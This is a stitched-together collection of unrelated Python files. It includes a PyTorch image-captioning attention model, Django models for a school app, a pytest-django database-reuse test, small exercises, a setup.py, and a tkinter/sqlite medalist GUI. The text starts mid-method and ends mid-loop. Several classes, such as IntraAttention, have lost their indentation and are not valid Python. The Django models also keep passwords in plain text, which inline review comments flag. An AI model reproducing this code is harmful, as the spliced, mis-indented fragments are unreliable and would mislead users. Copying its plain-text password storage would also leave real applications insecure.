        # att_res_0 = self.att0(state[0][-1], att_feats, p_att_feats, att_masks)
        h_0, state_0 = self.lstm0(torch.cat([xt,fc_feats],1), [state[0][0:1], state[1][0:1]])
        att_res_1 = self.att1(h_0, att_feats, p_att_feats, att_masks)
        h_1, state_1 = self.lstm1(torch.cat([h_0,att_res_1],1), [state[0][1:2], state[1][1:2]])
        att_res_2 = self.att2(h_1 + self.emb2(att_res_1), att_feats, p_att_feats, att_masks)
        h_2, state_2 = self.lstm2(torch.cat([self.fusion1(torch.cat([h_0, h_1], 1)),att_res_2],1), [state[0][2:3], state[1][2:3]])
        return self.fusion2(torch.cat([h_0, h_1, h_2], 1)), [torch.cat(_, 0) for _ in zip(state_0, state_1, state_2)]
class Attention(nn.Module):
    """Additive (Bahdanau-style) visual attention over spatial image features.

    Given decoder hidden state h and pre-projected image features, scores every
    spatial location, softmax-normalizes the scores (optionally masked), and
    returns the weighted sum of the raw features.
    """
    def __init__(self, opt):
        super(Attention, self).__init__()
        self.rnn_size = opt.rnn_size
        self.att_hid_size = opt.att_hid_size
        self.h2att = nn.Linear(self.rnn_size, self.att_hid_size)
        self.alpha_net = nn.Linear(self.att_hid_size, 1)
    def forward(self, h, att_feats, p_att_feats, att_masks=None):
        """h: (batch, rnn_size); att_feats: (batch, w*h, feat); p_att_feats is
        att_feats already projected to att_hid_size. Returns (batch, feat)."""
        num_locs = att_feats.numel() // att_feats.size(0) // att_feats.size(-1)
        projected = p_att_feats.view(-1, num_locs, self.att_hid_size)
        query = self.h2att(h).unsqueeze(1).expand_as(projected)      # batch x num_locs x att_hid
        activated = torch.tanh(projected + query)
        scores = self.alpha_net(activated.view(-1, self.att_hid_size)).view(-1, num_locs)
        weight = F.softmax(scores, dim=1)                            # batch x num_locs
        if att_masks is not None:
            # zero out padded locations, then renormalize to sum to 1
            weight = weight * att_masks.view(-1, num_locs).float()
            weight = weight / weight.sum(1, keepdim=True)
        feats = att_feats.view(-1, num_locs, att_feats.size(-1))
        return torch.bmm(weight.unsqueeze(1), feats).squeeze(1)      # batch x feat
class Att2in2Core(nn.Module):
    """Att2in LSTM core: attention context is injected only into the LSTM's
    input transform (via a2c), with a maxout over the two transform halves.
    """
    def __init__(self, opt):
        super(Att2in2Core, self).__init__()
        self.input_encoding_size = opt.input_encoding_size
        #self.rnn_type = opt.rnn_type
        self.rnn_size = opt.rnn_size
        #self.num_layers = opt.num_layers
        self.drop_prob_lm = opt.drop_prob_lm
        self.fc_feat_size = opt.fc_feat_size
        self.att_feat_size = opt.att_feat_size
        self.att_hid_size = opt.att_hid_size
        # Build a LSTM
        self.a2c = nn.Linear(self.rnn_size, 2 * self.rnn_size)
        self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
        self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
        self.dropout = nn.Dropout(self.drop_prob_lm)
        self.attention = Attention(opt)
    def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None, *args):
        """One timestep; returns (dropout(next_h), new (h, c) state)."""
        att_res = self.attention(state[0][-1], att_feats, p_att_feats, att_masks)
        #state[0][-1] is h and state[1][-1] is c
        all_input_sums = self.i2h(xt) + self.h2h(state[0][-1])
        # narrow(dim, start, length): selects elements [start, start+length) along dim;
        # the first 3*rnn_size units are the in/forget/out gates
        sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
        sigmoid_chunk = F.sigmoid(sigmoid_chunk)
        in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
        forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
        out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
        # input transform gets the attention context added, then maxout over halves
        in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
            self.a2c(att_res)
        in_transform = torch.max(\
            in_transform.narrow(1, 0, self.rnn_size),
            in_transform.narrow(1, self.rnn_size, self.rnn_size))
        next_c = forget_gate * state[1][-1] + in_gate * in_transform
        next_h = out_gate * F.tanh(next_c)
        # next_c / next_h: (batch_size, rnn_size), e.g. 50*512
        output = self.dropout(next_h)
        state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
        return output, state
class IntraAttention(nn.Module):
def __init__(self, opt):
super(IntraAttention, self).__init__()
self.rnn_size = opt.rnn_size
self.att_hid_size = opt.att_hid_size
self.h2att = nn.Linear(self.rnn_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
self.input_encoding_size = opt.input_encoding_size
# intraAttention
self.W_prevh = nn.Linear(self.rnn_size, self.att_hid_size, bias = False)
self.W_h = nn.Linear(self.rnn_size, self.att_hid_size)
self.v = nn.Linear(self.att_hid_size, 1, bias = False)
self.W_c = nn.Linear(self.input_encoding_size, self.att_hid_size)
'''
self.W_prevc = nn.Linear(self.rnn_size, self.att_hid_size, bias = False)
self.W_c = nn.Linear(self.rnn_size, self.att_hid_size)
self.v_c = nn.Linear(self.att_hid_size, 1, bias = False)
'''
# att_feats:[batch_size, w*h, rnn_size ]
# p_att_feats:[batch_size, w*h, att_hid_size]
# 两者都是[50, 196, 512]
def forward(self, h, c, att_feats, p_att_feats, att_masks=None, *args):
# intra attention,
if args != ():
states = args[0]
all_pre_h = [states[i][0][-1] for i in range(len(states))] # each element is (bs, rnn_size)
all_pre_h = [elem.unsqueeze(1) for elem in all_pre_h] # batch , 1, rnn_size
prev_h = torch.cat(all_pre_h, 1) # bs, t, rnn_size
bs = prev_h.size()[0]
t = prev_h.size()[1]
prev_hh = prev_h.view(-1, prev_h.size()[-1]) # bs*t, rnn_size
et = self.W_prevh(prev_hh) # bs*t, att_hid_size
et = et.view(bs, t, self.att_hid_size) # bs, t, att_hid_size
dec_fea = self.W_h(h).unsqueeze(1).expand_as(et) # bs, 1, att_hid_size -> bs ,t, att_hid_size h size is: bs, rnn_size
dec_xt = self.W_c(c).unsqueeze(1).expand_as(et)
et = et + dec_fea + dec_xt # bs, t, att_hid_size
et = F.tanh(et) # bs, t, att_hid_size
et = et.view(bs*t, -1) # bs*t, att_hid_size
et = self.v(et).squeeze(1).view(bs, t) # bs, t
at = F.softmax(et, dim = 1).unsqueeze(1) #bs, 1, t
ht_d = torch.bmm(at, prev_h).squeeze(1) # bs, rnn_size
print("at",at)
'''
all_pre_c = [states[i][1][-1] for i in range(len(states))]
all_pre_c = [elem.unsqueeze(1) for elem in all_pre_c] # batch , 1, rnn_size
prev_c = torch.cat(all_pre_c, 1) # bs, t, rnn_size
prev_cc = prev_c.view(-1, prev_c.size()[-1]) # bs*t, rnn_size
ct = self.W_prevc(prev_cc) # bs*t, att_hid_size
ct = ct.view(bs, t, self.att_hid_size) # bs, t, att_hid_size
dec_fea_c = self.W_c(c).unsqueeze(1).expand_as(ct) # bs, 1, att_hid_size -> bs ,t, att_hid_size h size is: bs, rnn_size
ct = ct + dec_fea_c # bs, t, att_hid_size
ct = F.tanh(ct) # bs, t, att_hid_size
ct = ct.view(bs * t, -1) # bs*t, att_hid_size
ct = self.v_c(ct).squeeze(1).view(bs, t) # bs, t
at_c = F.softmax(ct, dim=1).unsqueeze(1) # bs, 1, t
ct_d = torch.bmm(at_c, prev_c).squeeze(1) # bs, rnn_size
'''
# global global_index
# global_index += 1
# import numpy as np
# import os
# np.save(os.path.join("tempdata","prevh" + str(global_index)), prev_h.data.cpu().numpy())
# np.save(os.path.join("tempdata", "at" + str(global_index)), at.data.cpu().numpy())
# np.save(os.path.join("tempdata", "ct_d" + str(global_index)), ct_d.data.cpu().numpy())
# print("states", states)
# print("at", at)
# print("ct_d", ct_d)
#image attention, The p_att_feats here is already projected
att_size = att_feats.numel() // att_feats.size(0) // att_feats.size(-1)
att = p_att_feats.view(-1, att_size, self.att_hid_size)
att_h = self.h2att(h) # batch * att_hid_size
att_h = att_h.unsqueeze(1).expand_as(att) # batch * att_size * att_hid_size
dot = att + att_h # batch * att_size * att_hid_size
dot = F.tanh(dot) # batch * att_size * att_hid_size
dot = dot.view(-1, self.att_hid_size) # (batch * att_size) * att_hid_size
dot = self.alpha_net(dot) # (batch * att_size) * 1
dot = dot.view(-1, att_size) # batch * att_size
weight = F.softmax(dot, dim=1) # batch * att_size
if att_masks is not None:
weight = weight * att_masks.view(-1, att_size).float()
weight = weight / weight.sum(1, keepdim=True) # normalize to 1
att_feats_ = att_feats.view(-1, att_size, att_feats.size(-1)) # batch * att_size * att_feat_size
att_res = torch.bmm(weight.unsqueeze(1), att_feats_).squeeze(1) # batch * att_feat_size
# np.save(os.path.join("tempdata","att_feats" + str(global_index)), att_feats.data.cpu().numpy())
# np.save(os.path.join("tempdata", "weight" + str(global_index)), weight.data.cpu().numpy())
# np.save(os.path.join("tempdata", "att_res" + str(global_index)), att_res.data.cpu().numpy())
# print("att_feats", att_feats)
# print("weight", weight)
# print("att_res",att_res)
if args != ():
return att_res, ht_d
else:
return att_res
class IntraAtt2in2Core(nn.Module):
    def __init__(self, opt):
        """Att2in-style LSTM core augmented with intra (temporal) attention."""
        super(IntraAtt2in2Core, self).__init__()
        self.input_encoding_size = opt.input_encoding_size
        #self.rnn_type = opt.rnn_type
        self.rnn_size = opt.rnn_size
        #self.num_layers = opt.num_layers
        self.drop_prob_lm = opt.drop_prob_lm
        self.fc_feat_size = opt.fc_feat_size
        self.att_feat_size = opt.att_feat_size
        self.att_hid_size = opt.att_hid_size
        # Build a LSTM
        self.a2c = nn.Linear(self.rnn_size, 2 * self.rnn_size)  # attention context -> input-transform chunks
        self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
        self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
        self.dropout = nn.Dropout(self.drop_prob_lm)
        #intra-attention
        self.d2a = nn.Linear(self.rnn_size, 2 * self.rnn_size)  # intra-attention summary -> input-transform chunks
        #self.c2a = nn.Linear(self.rnn_size, 2 * self.rnn_size)
        self.attention = IntraAttention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None, *args):
if args != ():
att_res, ht_d = self.attention(state[0][-1], state[1][-1], att_feats, p_att_feats, att_masks, *args)
all_input_sums = self.i2h(xt) + self.h2h(ht_d)
else:
att_res = self.attention(state[0][-1], state[1][-1], att_feats, p_att_feats, att_masks)
all_input_sums = self.i2h(xt) + self.h2h(state[0][-1])
#print("ct_d", ct_d)
#print("att_res", att_res)
#state[0][-1] is h and state[1][-1] is c
#narrow(dim, index, size) 取出tensor中第dim维上索引从index开始到index+size-1的所有元素存放在data中
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
if args != ():
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
self.a2c(att_res) + self.d2a(ht_d)
else:
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
self.a2c(att_res)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
next_c = forget_gate * state[1][-1] + in_gate * in_transform
next_h = out_gate * F.tanh(next_c)
#next_c: 50*512 next_h:50*512 也就是batch_size*rnn_size
output = self.dropout(next_h)
state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
if args == ():
return output, state, att_res
else:
return output, state, att_res, ht_d
class Att2inCore(Att2in2Core):
    """Att2in core: identical to Att2in2Core except that the attention-result
    projection consumes raw attention features instead of embedded ones."""
    def __init__(self, opt):
        super(Att2inCore, self).__init__(opt)
        # Re-create a2c so it accepts raw att features (att_feat_size wide)
        # rather than the rnn_size-wide embedded features of the parent.
        del self.a2c
        self.a2c = nn.Linear(self.att_feat_size, 2 * self.rnn_size)
"""
Note this is my attempt to replicate att2all model in self-critical paper.
However, this is not a correct replication actually. Will fix it.
"""
class Att2all2Core(nn.Module):
    """LSTM core that feeds the attention result into ALL gates (via a2h),
    not just the input transform as in Att2in2Core."""
    def __init__(self, opt):
        super(Att2all2Core, self).__init__()
        self.input_encoding_size = opt.input_encoding_size
        #self.rnn_type = opt.rnn_type
        self.rnn_size = opt.rnn_size
        #self.num_layers = opt.num_layers
        self.drop_prob_lm = opt.drop_prob_lm
        self.fc_feat_size = opt.fc_feat_size
        self.att_feat_size = opt.att_feat_size
        self.att_hid_size = opt.att_hid_size
        # Build a LSTM
        self.a2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
        self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
        self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
        self.dropout = nn.Dropout(self.drop_prob_lm)
        self.attention = Attention(opt)
    def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
        # Visual attention conditioned on the previous hidden state.
        att_res = self.attention(state[0][-1], att_feats, p_att_feats, att_masks)
        # The attention result contributes to every gate here (a2h).
        all_input_sums = self.i2h(xt) + self.h2h(state[0][-1]) + self.a2h(att_res)
        sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
        # torch.sigmoid / torch.tanh replace the deprecated F.sigmoid / F.tanh.
        sigmoid_chunk = torch.sigmoid(sigmoid_chunk)
        in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
        forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
        out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
        in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size)
        # Maxout nonlinearity over the two halves of the input transform.
        in_transform = torch.max(\
            in_transform.narrow(1, 0, self.rnn_size),
            in_transform.narrow(1, self.rnn_size, self.rnn_size))
        next_c = forget_gate * state[1][-1] + in_gate * in_transform
        next_h = out_gate * torch.tanh(next_c)
        output = self.dropout(next_h)
        state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
        return output, state
class AdaAttModel(AttModel):
    """AttModel variant that uses the adaptive-attention (AdaAtt) core."""
    def __init__(self, opt):
        super(AdaAttModel, self).__init__(opt)
        self.core = AdaAttCore(opt)
# AdaAtt with maxout lstm
class AdaAttMOModel(AttModel):
    """AdaAtt variant whose core is built with the maxout-LSTM flag set."""
    def __init__(self, opt):
        super(AdaAttMOModel, self).__init__(opt)
        self.core = AdaAttCore(opt, True)
class Att2in2Model(AttModel):
    """AttModel using the Att2in2 core; fc features bypass the embedding."""
    def __init__(self, opt):
        super(Att2in2Model, self).__init__(opt)
        self.core = Att2in2Core(opt)
        # Replace the fc embedding with identity: this core consumes raw fc features.
        delattr(self, 'fc_embed')
        self.fc_embed = lambda x : x
class IntraAtt2in2Model(AttModel):
    """Att2in2 model augmented with intra-attention (IntraAtt2in2Core)."""
    def __init__(self, opt):
        super(IntraAtt2in2Model, self).__init__(opt)
        self.core = IntraAtt2in2Core(opt)
        # Raw fc features are passed straight through, as in Att2in2Model.
        delattr(self, 'fc_embed')
        self.fc_embed = lambda x : x
class Att2all2Model(AttModel):
    """AttModel using the Att2all2 core; fc features bypass the embedding."""
    def __init__(self, opt):
        super(Att2all2Model, self).__init__(opt)
        self.core = Att2all2Core(opt)
        delattr(self, 'fc_embed')
        self.fc_embed = lambda x : x
class TopDownModel(AttModel):
    """Two-layer top-down attention model."""
    def __init__(self, opt):
        super(TopDownModel, self).__init__(opt)
        self.num_layers = 2
        self.core = TopDownCore(opt)
class StackAttModel(AttModel):
    """Three-layer stacked-attention model."""
    def __init__(self, opt):
        super(StackAttModel, self).__init__(opt)
        self.num_layers = 3
        self.core = StackAttCore(opt)
class DenseAttModel(AttModel):
    """Three-layer densely-connected attention model."""
    def __init__(self, opt):
        super(DenseAttModel, self).__init__(opt)
        self.num_layers = 3
        self.core = DenseAttCore(opt)
class Att2inModel(AttModel):
    """Original att2in model: consumes raw fc/att features and re-initializes
    its own word embedding and attention projection."""
    def __init__(self, opt):
        super(Att2inModel, self).__init__(opt)
        # Raw (unembedded) fc and att features are used directly.
        del self.embed, self.fc_embed, self.att_embed
        self.embed = nn.Embedding(self.vocab_size + 1, self.input_encoding_size)
        self.fc_embed = self.att_embed = lambda x: x
        # Project raw att features (att_feat_size wide) into attention space.
        del self.ctx2att
        self.ctx2att = nn.Linear(self.att_feat_size, self.att_hid_size)
        self.core = Att2inCore(opt)
        self.init_weights()
    def init_weights(self):
        """Uniformly initialize the word embedding and output logit layers."""
        initrange = 0.1
        self.embed.weight.data.uniform_(-initrange, initrange)
        self.logit.bias.data.fill_(0)
        self.logit.weight.data.uniform_(-initrange, initrange)
|
from django.db import models
class Student(models.Model):
    """A student account record."""
    id=models.AutoField(primary_key=True)
    name=models.CharField(max_length=255)
    # NOTE(review): models.EmailField would add address validation — needs a migration.
    email=models.CharField(max_length=255)
    address=models.TextField()
    gender=models.CharField(max_length=255)
    # NOTE(review): password appears to be stored as plain text; it should be
    # hashed (e.g. via django.contrib.auth) before production use.
    password=models.CharField(max_length=255)
    objects = models.Manager()
    def __str__(self):
        return self.name
class Staff(models.Model):
    """A staff-member account record."""
    id=models.AutoField(primary_key=True)
    name=models.CharField(max_length=255)
    email=models.CharField(max_length=255)
    # NOTE(review): plain-text password — same concern as Student.
    password=models.CharField(max_length=255)
    address=models.TextField()
    objects = models.Manager()
    def __str__(self):
        return self.name
class Admin(models.Model):
    """An administrator account record."""
    id=models.AutoField(primary_key=True)
    name=models.CharField(max_length=255)
    email=models.CharField(max_length=255)
    password=models.CharField(max_length=255)
    objects=models.Manager()
class Subject(models.Model):
    """A subject; each row is tied to one student via a foreign key."""
    id=models.AutoField(primary_key=True)
    sub_name=models.CharField(max_length=255)
    student_id=models.ForeignKey(Student,on_delete=models.CASCADE)
    objects=models.Manager()
class LeaveStudent(models.Model):
    """A student's leave request; leave_status flags approval."""
    id=models.AutoField(primary_key=True)
    student_id=models.ForeignKey(Student,on_delete=models.CASCADE)
    # NOTE(review): the date is stored as free text; models.DateField would be
    # safer, but switching requires a migration and data conversion.
    leave_date=models.CharField(max_length=255)
    leave_status=models.BooleanField(default=False)
    objects=models.Manager()
class LeaveStaff(models.Model):
    """A staff member's leave request; leave_status flags approval."""
    id=models.AutoField(primary_key=True)
    staff_id=models.ForeignKey(Staff,on_delete=models.CASCADE)
    leave_date=models.CharField(max_length=255)
    leave_status=models.BooleanField(default=False)
    objects=models.Manager()
class FeedBackStudent(models.Model):
    """Feedback submitted by a student, with an admin/staff reply field."""
    id=models.AutoField(primary_key=True)
    student_id=models.ForeignKey(Student,on_delete=models.CASCADE)
    feedback=models.TextField()
    feedback_reply=models.TextField()
    objects=models.Manager()
class FeedBackStaff(models.Model):
    """Feedback submitted by a staff member, with a reply field."""
    id=models.AutoField(primary_key=True)
    staff_id=models.ForeignKey(Staff,on_delete=models.CASCADE)
    feedback=models.TextField()
    feedback_reply=models.TextField()
    objects=models.Manager()
class NotificationStaff(models.Model):
    """A notification message addressed to one staff member."""
    id = models.AutoField(primary_key=True)
    staff_id= models.ForeignKey(Staff, on_delete=models.CASCADE)
    message = models.TextField()
    objects = models.Manager()
class NotificationStudent(models.Model):
    """A notification message addressed to one student."""
    id = models.AutoField(primary_key=True)
    student_id= models.ForeignKey(Student, on_delete=models.CASCADE)
    message = models.TextField()
    objects = models.Manager()
import py
from django.conf import settings
from .conftest import create_test_module
from .db_helpers import mark_exists, mark_database, drop_database, db_exists
def test_db_reuse(django_testdir):
    """
    Test the re-use db functionality. This test requires a PostgreSQL server
    to be available and the environment variables PG_HOST, PG_DB, PG_USER to
    be defined.
    """
    # SQLite uses throwaway in-memory/file databases, so re-use is meaningless.
    if settings.DATABASES['default']['ENGINE'] == 'django.db.backends.sqlite3':
        py.test.skip('Do not test db reuse since database does not support it')
    # A minimal test module that touches the database, run in a sub-pytest.
    create_test_module(django_testdir, '''
    import pytest
    from app.models import Item
    @pytest.mark.django_db
    def test_db_can_be_accessed():
        assert Item.objects.count() == 0
''')
    # Use --create-db on the first run to make sure we are not just re-using a
    # database from another test run
    drop_database()
    assert not db_exists()
    # Do not pass in --create-db to make sure it is created when it
    # does not exist
    result_first = django_testdir.runpytest('-v', '--reuse-db')
    result_first.stdout.fnmatch_lines([
        "*test_db_can_be_accessed PASSED*",
    ])
    # A fresh database carries no re-use marker yet; plant one manually.
    assert not mark_exists()
    mark_database()
    assert mark_exists()
    result_second = django_testdir.runpytest('-v', '--reuse-db')
    result_second.stdout.fnmatch_lines([
        "*test_db_can_be_accessed PASSED*",
    ])
    # Make sure the database has not been re-created
    assert mark_exists()
    # --create-db must force re-creation even when --reuse-db is also given.
    result_third = django_testdir.runpytest('-v', '--reuse-db', '--create-db')
    result_third.stdout.fnmatch_lines([
        "*test_db_can_be_accessed PASSED*",
    ])
    # Make sure the database has been re-created and the mark is gone
    assert not mark_exists()
# def test_conftest_connection_caching(django_testdir, monkeypatch):
# """
# Make sure django.db.connections is properly cleared before a @django_db
# test, when a connection to the actual database has been constructed.
# """
# tpkg_path = setup_test_environ(django_testdir, monkeypatch, '''
# import pytest
# from django.test import TestCase
# from django.conf import settings
# from app.models import Item
# def test_a():
# # assert settings.DATABASES['default']['NAME'] == 'test_pytest_django_db_testasdf'
# Item.objects.count()
# @pytest.mark.django_db
# def test_b():
# assert settings.DATABASES['default']['NAME'] == 'test_pytest_django_db_test'
# Item.objects.count()
# ''')
# tpkg_path.join('conftest.py').write('''
# # from app.models import Item
# # Item.objects.count()
# # from django.db import models
# from django.db import connection
# cursor = connection.cursor()
# cursor.execute('SELECT 1')
# ''')
# result = django_testdir.runpytest('-v')
# result.stdout.fnmatch_lines([
# "*test_b PASSED*",
# "*test_a PASSED*",
# ])
|
# A 3x4 grid of numbers stored as a list of row lists.
num_grid = [
    [1, 2, 3, 4],
    [5, 6, 7, 8],
    [22, 26, 27, 28],
]

# Element access: row index first, then column index.
print(num_grid[2][2])
print(num_grid[0][0])

# Nested loop: visit every row, then every value inside that row.
for current_row in num_grid:
    for value in current_row:
        print(value)
# print(num_grid)
# Packaging script for the interact_fit distribution.
# NOTE(review): `version` is imported but never used and could be dropped.
from setuptools import setup, find_packages, version
setup(
    name = "interact_fit",
    version = '0.0.4',
    packages = find_packages()
)
import sqlite3
from tkinter import *
""" Classes """
class MenuBtn:
    """Toolbar helper: creates a gridded Button as a side effect of construction."""
    def __init__(self, parent, text, command, row, col):
        # Keep the construction arguments around for later inspection.
        self.parent = parent
        self.text = text
        self.command = command
        self.row = row
        self.col = col
        # Build and place the button; no reference is retained (matches caller usage).
        button = Button(parent, text=text, command=command)
        button.grid(row=row, column=col, padx=10)
class MainWindow:
    """Top-level GUI: a toolbar switching between three stacked content frames
    (all medalists / filter by medal / add a medalist)."""
    def __init__(self, parent):
        self.parent = parent
        # Set up the main GUI window
        self.parent.geometry("450x450")
        self.parent.title("Olympic Medalists")
        self.parent.columnconfigure(0,weight=1)
        self.parent.rowconfigure(1,weight=1)
        # Main Menu Bar
        toolbar = Frame(self.parent ,bg="#006494", padx=10, pady=5)
        toolbar.grid(row=0, column=0, sticky=E+W)
        # The menu buttons
        btn_all = MenuBtn(toolbar,"All",lambda: self.show_frame(f1),0,0)
        btn_medal = MenuBtn(toolbar,"Medal",lambda: self.show_frame(f2),0,1)
        btn_medalist = MenuBtn(toolbar,"Medalist",lambda: self.show_frame(f3),0,2)
        # Main Content Area
        frame_main = Frame(self.parent ,bg="#ffcc00", padx=10, pady=5)
        frame_main.grid(row=1, column=0, sticky=N+E+W+S)
        # Content Frames - all stacked in the same grid cell; tkraise() selects one.
        f1 = Frame(frame_main, bg="#ffcc00", padx=0, pady=5)
        f2 = Frame(frame_main, bg="#ffcc00", padx=0, pady=5)
        f3 = Frame(frame_main, bg="#ffcc00", padx=0, pady=5)
        for frame in (f1, f2, f3):
            frame.grid(row=1, column=0, sticky=N+E+W+S)
        # Frame 1 - Select All
        def refreshAll():
            # Re-query the database and rebuild the label grid in f1.
            medalists = select_all()
            for i,row in enumerate(medalists):
                rowID = int(i)
                Label(f1, text=row[0],bg="#ffcc00", anchor="w").grid(row=rowID, column=0, padx=10, sticky=E+W)
                Label(f1, text=row[1],bg="#ffcc00", anchor="w").grid(row=rowID, column=1, padx=10, sticky=E+W)
                Label(f1, text=row[2],bg="#ffcc00", anchor="w").grid(row=rowID, column=2, padx=10, sticky=E+W)
                Label(f1, text=row[3],bg="#ffcc00", anchor="w").grid(row=rowID, column=3, padx=10, sticky=E+W)
        Button(f1, text = "Refresh", command = refreshAll).grid(row=0, column=4)
        # Frame 2 - Select Medal
        f2_form = Frame(f2, bg="#ffcc00", padx=0, pady=0)
        f2_form.grid(row=0, column=0, sticky=W)
        f2_results = Frame(f2, bg="#ffcc00", padx=0, pady=0)
        f2_results.grid(row=0, column=1, sticky=N+E+W+S)
        variable = StringVar(f2_form)
        variable.set("Silver") # default value
        def medaltype(medal):
            # NOTE(review): the `medal` argument is ignored; the query always
            # uses the radio-button variable's current value.
            select_medal_results = select_medal(variable.get())
            print(variable.get())
            for i,row in enumerate(select_medal_results):
                rowID = int(i)
                Label(f2_results, text=row[0],bg="#ffcc00", anchor="w").grid(row=rowID, column=0, padx=10, sticky=E+W)
                Label(f2_results, text=row[1],bg="#ffcc00", anchor="w").grid(row=rowID, column=1, padx=10, sticky=E+W)
                Label(f2_results, text=row[2],bg="#ffcc00", anchor="w").grid(row=rowID, column=2, padx=10, sticky=E+W)
                Label(f2_results, text=row[3],bg="#ffcc00", anchor="w").grid(row=rowID, column=3, padx=10, sticky=E+W)
        medaltype(variable) #Initial display of the results
        #o = OptionMenu(f2_form, variable, "Gold", "Silver", "Bronze", command=medaltype).pack()
        # Radio Buttons
        MODES = [
            ("Gold", "Gold"),
            ("Silver", "Silver"),
            ("Bronze", "Bronze"),
        ]
        for text, mode in MODES:
            # NOTE(review): `lambda: medaltype(mode)` late-binds `mode` (all three
            # buttons capture the final loop value), but this is harmless here
            # because medaltype() ignores its argument and reads `variable`.
            b = Radiobutton(f2_form, text=text, variable=variable, value=mode, command=lambda: medaltype(mode), bg="#ffcc00")
            b.pack(anchor="w")
        # Frame 3 - Add Medal
        Label(f3, text="First Name", bg="#ffcc00", anchor="w").grid(row=0, column=0,sticky=E+W)
        Label(f3, text="Last Name", bg="#ffcc00", anchor="w").grid(row=1, column=0,sticky=E+W)
        Label(f3, text="Medal", bg="#ffcc00", anchor="w").grid(row=2, column=0,sticky=E+W)
        Label(f3, text="Event", bg="#ffcc00", anchor="w").grid(row=3, column=0,sticky=E+W)
        NewFirstName = StringVar()
        NewLastName = StringVar()
        NewMedal = StringVar()
        NewEvent = StringVar()
        entry_firstname = Entry(f3,textvariable=NewFirstName).grid(row=0,column=1)
        entry_lastname = Entry(f3,textvariable=NewLastName).grid(row=1,column=1)
        entry_medal = Entry(f3,textvariable=NewMedal).grid(row=2,column=1)
        entry_event = Entry(f3,textvariable=NewEvent).grid(row=3,column=1)
        def Add_Medal_Var():
            # Collect the entry values and insert a new record.
            firstname = NewFirstName.get()
            lastname = NewLastName.get()
            event = NewEvent.get()
            medal = NewMedal.get()
            add_medalist(medal,firstname,lastname,event)
            print("You have added: {0}, {1}, {2}, {3}".format(medal,firstname,lastname,event))
        Button(f3, text = "Add Medalist", command = Add_Medal_Var).grid(row=4, column=1, padx=10)
        self.show_frame(f2)
    def show_frame(self, page_name):
        '''Show a frame for the given page name'''
        frame = page_name
        print(page_name)
        # NOTE(review): `page_name` is a Frame widget, so comparing it with the
        # string "f1" is always False — this branch is dead. Also, `app` is not
        # defined in this scope, so app.refreshAll() would raise if reached.
        if page_name == "f1":
            frame.tkraise()
            app.refreshAll()
        else:
            frame.tkraise()
""" Functions """
def select_all():
    """Return every medalist as a list of (Medal, FirstName, LastName, Event) tuples."""
    with sqlite3.connect("medals.db") as db:
        rows = db.cursor().execute(
            "select Medal,FirstName,LastName,Event from Medalists"
        ).fetchall()
    print(rows)
    return rows
def select_medal(medal):
    """Return all medalist rows whose Medal column equals *medal*.

    Uses a parameterized query: the previous str.format() version was open to
    SQL injection and crashed on values containing a single quote.
    """
    with sqlite3.connect("medals.db") as db:
        cursor = db.cursor()
        cursor.execute(
            "SELECT Medal,FirstName,LastName,Event FROM Medalists WHERE Medal=?",
            (medal,),
        )
        return cursor.fetchall()
def add_medalist(medal, firstname, lastname, event):
    """Insert one medalist record into the Medalists table."""
    record = (medal, firstname, lastname, event)
    with sqlite3.connect("medals.db") as db:
        db.cursor().execute(
            "INSERT INTO Medalists(Medal,FirstName,LastName,Event) VALUES (?,?,?,?)",
            record,
        )
        db.commit()
def main():
    """Create the Tk root, build the main window, and enter the event loop."""
    root = Tk()
    app = MainWindow(root)
    root.mainloop()
# Launch the application when the module is executed.
main()
"""
def menu():
print("\nWhat would you like to see? ")
print("1. All medalists")
print("2. Show medalists by medal")
print("3. Add a new medalist")
choice = input("Please enter your choice (1,2 or 3) ")
if choice == "1":
medalists = select_all()
for row in medalists:
print("{0:8} {1:6} {2:10} {3}".format(row[0], row[1], row[2], row[3]))
elif choice == "2":
medaltype = input("Which medal type do you want?")
medalists = select_medal(medaltype)
for row in medalists:
print("{0:8} {1:6} {2:10} {3}".format(row[0], row[1], row[2], row[3]))
elif choice =="3":
add_medalist()
else:
print("Please choose a valid option")
menu()
def main():
root = Tk()
app = MainWindow(root)
f1 = Frame(root, bg="#ffcc00", padx=10, pady=5)
f2 = Frame(root, bg="#ffcc00")
f3 = Frame(root, bg="#ffcc00")
f4 = Frame(root, bg="#ffcc00")
for frame in (f1, f2, f3, f4):
